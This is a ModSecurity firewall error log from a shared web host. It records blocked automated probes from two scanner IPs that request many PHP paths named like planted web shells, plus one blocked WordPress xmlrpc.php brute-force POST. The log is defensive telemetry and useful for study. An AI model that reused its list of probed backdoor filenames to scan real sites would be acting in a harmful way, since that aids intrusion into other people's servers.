[Tue May 26 16:35:14.068188 2026] [security2:error] [pid 808625:tid 808774] [client 20.151.117.104:27055] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/rip.php"] [unique_id "ahV-ajEl_SBaWibfDmphlwAAABM"]
[Tue May 26 16:35:14.068300 2026] [security2:error] [pid 808625:tid 808774] [client 20.151.117.104:27055] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/rip.php"] [unique_id "ahV-ajEl_SBaWibfDmphlwAAABM"]
[Tue May 26 16:35:14.074347 2026] [security2:error] [pid 808625:tid 808850] [client 130.131.224.225:65139] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/revealability.php"] [unique_id "ahV-ajEl_SBaWibfDmphmAAAAF8"]
[Tue May 26 16:35:14.074441 2026] [security2:error] [pid 808625:tid 808850] [client 130.131.224.225:65139] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/revealability.php"] [unique_id "ahV-ajEl_SBaWibfDmphmAAAAF8"]
[Tue May 26 16:35:14.218103 2026] [security2:error] [pid 808625:tid 808847] [client 20.151.117.104:31184] ModSecurity: Warning. Pattern match "/1\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1543"] [id "900921"] [msg "temporary TUW-72162 logging rule"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/1.php"] [unique_id "ahV-ajEl_SBaWibfDmphnAAAAFw"]
[Tue May 26 16:35:14.218218 2026] [security2:error] [pid 808625:tid 808847] [client 20.151.117.104:31184] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/1.php"] [unique_id "ahV-ajEl_SBaWibfDmphnAAAAFw"]
[Tue May 26 16:35:14.218337 2026] [security2:error] [pid 808625:tid 808847] [client 20.151.117.104:31184] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/1.php"] [unique_id "ahV-ajEl_SBaWibfDmphnAAAAFw"]
[Tue May 26 16:35:14.227314 2026] [security2:error] [pid 808625:tid 808803] [client 130.131.224.225:65076] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/forbidals.php"] [unique_id "ahV-ajEl_SBaWibfDmphnQAAADA"]
[Tue May 26 16:35:14.227393 2026] [security2:error] [pid 808625:tid 808803] [client 130.131.224.225:65076] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/forbidals.php"] [unique_id "ahV-ajEl_SBaWibfDmphnQAAADA"]
[Tue May 26 16:35:14.354708 2026] [security2:error] [pid 808625:tid 808763] [client 130.131.224.225:65090] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/i.php"] [unique_id "ahV-ajEl_SBaWibfDmphnwAAAAg"]
[Tue May 26 16:35:14.354810 2026] [security2:error] [pid 808625:tid 808763] [client 130.131.224.225:65090] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/i.php"] [unique_id "ahV-ajEl_SBaWibfDmphnwAAAAg"]
[Tue May 26 16:35:14.361543 2026] [security2:error] [pid 808625:tid 808760] [client 20.151.117.104:59373] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/chosen.php"] [unique_id "ahV-ajEl_SBaWibfDmphoAAAAAU"]
[Tue May 26 16:35:14.361671 2026] [security2:error] [pid 808625:tid 808760] [client 20.151.117.104:59373] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/chosen.php"] [unique_id "ahV-ajEl_SBaWibfDmphoAAAAAU"]
[Tue May 26 16:35:14.438585 2026] [security2:error] [pid 808625:tid 808755] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-ajEl_SBaWibfDmphlAAAAAA"]
[Tue May 26 16:35:14.487496 2026] [security2:error] [pid 808625:tid 808790] [client 130.131.224.225:65096] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/900.php"] [unique_id "ahV-ajEl_SBaWibfDmphoQAAACM"]
[Tue May 26 16:35:14.487605 2026] [security2:error] [pid 808625:tid 808790] [client 130.131.224.225:65096] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/900.php"] [unique_id "ahV-ajEl_SBaWibfDmphoQAAACM"]
[Tue May 26 16:35:14.506022 2026] [security2:error] [pid 808625:tid 808861] [client 20.151.117.104:34877] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/css.php"] [unique_id "ahV-ajEl_SBaWibfDmphogAAAGo"]
[Tue May 26 16:35:14.506123 2026] [security2:error] [pid 808625:tid 808861] [client 20.151.117.104:34877] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/css.php"] [unique_id "ahV-ajEl_SBaWibfDmphogAAAGo"]
[Tue May 26 16:35:14.638572 2026] [security2:error] [pid 808625:tid 808855] [client 130.131.224.225:65047] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/kj.php"] [unique_id "ahV-ajEl_SBaWibfDmphowAAAGQ"]
[Tue May 26 16:35:14.638696 2026] [security2:error] [pid 808625:tid 808855] [client 130.131.224.225:65047] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/kj.php"] [unique_id "ahV-ajEl_SBaWibfDmphowAAAGQ"]
[Tue May 26 16:35:14.649925 2026] [security2:error] [pid 808625:tid 808862] [client 20.151.117.104:8406] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/php.php"] [unique_id "ahV-ajEl_SBaWibfDmphpAAAAGs"]
[Tue May 26 16:35:14.650031 2026] [security2:error] [pid 808625:tid 808862] [client 20.151.117.104:8406] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/php.php"] [unique_id "ahV-ajEl_SBaWibfDmphpAAAAGs"]
[Tue May 26 16:35:14.761338 2026] [security2:error] [pid 808625:tid 808765] [client 130.131.224.225:62657] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/wuasr.php"] [unique_id "ahV-ajEl_SBaWibfDmphpwAAAAo"]
[Tue May 26 16:35:14.761484 2026] [security2:error] [pid 808625:tid 808765] [client 130.131.224.225:62657] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/wuasr.php"] [unique_id "ahV-ajEl_SBaWibfDmphpwAAAAo"]
[Tue May 26 16:35:14.793184 2026] [security2:error] [pid 808625:tid 808874] [client 20.151.117.104:27043] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/wp-Blogs.php"] [unique_id "ahV-ajEl_SBaWibfDmphqQAAAHc"]
[Tue May 26 16:35:14.793273 2026] [security2:error] [pid 808625:tid 808874] [client 20.151.117.104:27043] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/wp-Blogs.php"] [unique_id "ahV-ajEl_SBaWibfDmphqQAAAHc"]
[Tue May 26 16:35:14.898068 2026] [security2:error] [pid 808625:tid 808843] [client 130.131.224.225:64600] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/t.php"] [unique_id "ahV-ajEl_SBaWibfDmphrQAAAFg"]
[Tue May 26 16:35:14.898203 2026] [security2:error] [pid 808625:tid 808843] [client 130.131.224.225:64600] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/t.php"] [unique_id "ahV-ajEl_SBaWibfDmphrQAAAFg"]
[Tue May 26 16:35:14.915790 2026] [security2:error] [pid 808625:tid 808820] [client 117.198.37.168:58576] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV-ajEl_SBaWibfDmphrgAAAEE"]
[Tue May 26 16:35:14.915886 2026] [security2:error] [pid 808625:tid 808820] [client 117.198.37.168:58576] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV-ajEl_SBaWibfDmphrgAAAEE"]
[Tue May 26 16:35:14.936282 2026] [security2:error] [pid 808625:tid 808872] [client 20.151.117.104:9789] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/wp-content/index.php"] [unique_id "ahV-ajEl_SBaWibfDmphrwAAAHU"]
[Tue May 26 16:35:14.936393 2026] [security2:error] [pid 808625:tid 808872] [client 20.151.117.104:9789] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/wp-content/index.php"] [unique_id "ahV-ajEl_SBaWibfDmphrwAAAHU"]
[Tue May 26 16:35:15.084664 2026] [security2:error] [pid 808625:tid 808757] [client 20.151.117.104:25850] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/wp-content/plugins/beteng88/ws83.php"] [unique_id "ahV-azEl_SBaWibfDmphsAAAAAI"]
[Tue May 26 16:35:15.084802 2026] [security2:error] [pid 808625:tid 808757] [client 20.151.117.104:25850] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/wp-content/plugins/beteng88/ws83.php"] [unique_id "ahV-azEl_SBaWibfDmphsAAAAAI"]
[Tue May 26 16:35:15.109369 2026] [security2:error] [pid 808625:tid 808783] [client 130.131.224.225:62661] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/class-t.api.php"] [unique_id "ahV-azEl_SBaWibfDmphsQAAABw"]
[Tue May 26 16:35:15.109467 2026] [security2:error] [pid 808625:tid 808783] [client 130.131.224.225:62661] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/class-t.api.php"] [unique_id "ahV-azEl_SBaWibfDmphsQAAABw"]
[Tue May 26 16:35:15.229124 2026] [security2:error] [pid 808625:tid 808786] [client 20.151.117.104:34877] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/ws83.php"] [unique_id "ahV-azEl_SBaWibfDmphtgAAAB8"]
[Tue May 26 16:35:15.229262 2026] [security2:error] [pid 808625:tid 808786] [client 20.151.117.104:34877] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/ws83.php"] [unique_id "ahV-azEl_SBaWibfDmphtgAAAB8"]
[Tue May 26 16:35:15.373362 2026] [security2:error] [pid 808625:tid 808781] [client 20.151.117.104:31197] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/file61.php"] [unique_id "ahV-azEl_SBaWibfDmphugAAABo"]
[Tue May 26 16:35:15.373492 2026] [security2:error] [pid 808625:tid 808781] [client 20.151.117.104:31197] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/file61.php"] [unique_id "ahV-azEl_SBaWibfDmphugAAABo"]
[Tue May 26 16:35:15.462094 2026] [security2:error] [pid 808625:tid 808834] [client 130.131.224.225:63286] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/wp-slss.php"] [unique_id "ahV-azEl_SBaWibfDmphvgAAAE8"]
[Tue May 26 16:35:15.462244 2026] [security2:error] [pid 808625:tid 808834] [client 130.131.224.225:63286] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/wp-slss.php"] [unique_id "ahV-azEl_SBaWibfDmphvgAAAE8"]
[Tue May 26 16:35:15.516457 2026] [security2:error] [pid 808625:tid 808799] [client 20.151.117.104:27062] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/sadcut1.php"] [unique_id "ahV-azEl_SBaWibfDmphvwAAACw"]
[Tue May 26 16:35:15.516540 2026] [security2:error] [pid 808625:tid 808799] [client 20.151.117.104:27062] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/sadcut1.php"] [unique_id "ahV-azEl_SBaWibfDmphvwAAACw"]
[Tue May 26 16:35:15.639172 2026] [security2:error] [pid 808625:tid 808833] [client 130.131.224.225:63876] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/crgio.php"] [unique_id "ahV-azEl_SBaWibfDmphwAAAAE4"]
[Tue May 26 16:35:15.639297 2026] [security2:error] [pid 808625:tid 808833] [client 130.131.224.225:63876] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/crgio.php"] [unique_id "ahV-azEl_SBaWibfDmphwAAAAE4"]
[Tue May 26 16:35:15.660958 2026] [security2:error] [pid 808625:tid 808792] [client 20.151.117.104:2161] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/y.php"] [unique_id "ahV-azEl_SBaWibfDmphwQAAACU"]
[Tue May 26 16:35:15.661075 2026] [security2:error] [pid 808625:tid 808792] [client 20.151.117.104:2161] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/y.php"] [unique_id "ahV-azEl_SBaWibfDmphwQAAACU"]
[Tue May 26 16:35:15.784336 2026] [security2:error] [pid 808625:tid 808775] [client 130.131.224.225:63309] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/Okxob.php"] [unique_id "ahV-azEl_SBaWibfDmphwgAAABQ"]
[Tue May 26 16:35:15.784436 2026] [security2:error] [pid 808625:tid 808775] [client 130.131.224.225:63309] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/Okxob.php"] [unique_id "ahV-azEl_SBaWibfDmphwgAAABQ"]
[Tue May 26 16:35:15.803732 2026] [security2:error] [pid 808625:tid 808774] [client 20.151.117.104:19142] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/666.php"] [unique_id "ahV-azEl_SBaWibfDmphwwAAABM"]
[Tue May 26 16:35:15.803873 2026] [security2:error] [pid 808625:tid 808774] [client 20.151.117.104:19142] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/666.php"] [unique_id "ahV-azEl_SBaWibfDmphwwAAABM"]
[Tue May 26 16:35:15.946555 2026] [security2:error] [pid 808625:tid 808847] [client 20.151.117.104:9750] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/7.php"] [unique_id "ahV-azEl_SBaWibfDmphxwAAAFw"]
[Tue May 26 16:35:15.946672 2026] [security2:error] [pid 808625:tid 808847] [client 20.151.117.104:9750] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/7.php"] [unique_id "ahV-azEl_SBaWibfDmphxwAAAFw"]
[Tue May 26 16:35:15.966193 2026] [security2:error] [pid 808625:tid 808803] [client 130.131.224.225:62686] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/mass.php"] [unique_id "ahV-azEl_SBaWibfDmphyAAAADA"]
[Tue May 26 16:35:15.966335 2026] [security2:error] [pid 808625:tid 808803] [client 130.131.224.225:62686] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/mass.php"] [unique_id "ahV-azEl_SBaWibfDmphyAAAADA"]
[Tue May 26 16:35:16.089849 2026] [security2:error] [pid 808625:tid 808805] [client 20.151.117.104:21010] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/wp-config-sample.php"] [unique_id "ahV-bDEl_SBaWibfDmphyQAAADI"]
[Tue May 26 16:35:16.089982 2026] [security2:error] [pid 808625:tid 808805] [client 20.151.117.104:21010] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/wp-config-sample.php"] [unique_id "ahV-bDEl_SBaWibfDmphyQAAADI"]
[Tue May 26 16:35:16.143162 2026] [security2:error] [pid 808625:tid 808804] [client 130.131.224.225:63936] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/dropdown.php"] [unique_id "ahV-bDEl_SBaWibfDmphywAAADE"]
[Tue May 26 16:35:16.143281 2026] [security2:error] [pid 808625:tid 808804] [client 130.131.224.225:63936] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/dropdown.php"] [unique_id "ahV-bDEl_SBaWibfDmphywAAADE"]
[Tue May 26 16:35:16.240374 2026] [security2:error] [pid 808625:tid 808828] [client 20.151.117.104:19181] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/log.php"] [unique_id "ahV-bDEl_SBaWibfDmphzgAAAEk"]
[Tue May 26 16:35:16.240473 2026] [security2:error] [pid 808625:tid 808828] [client 20.151.117.104:19181] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/log.php"] [unique_id "ahV-bDEl_SBaWibfDmphzgAAAEk"]
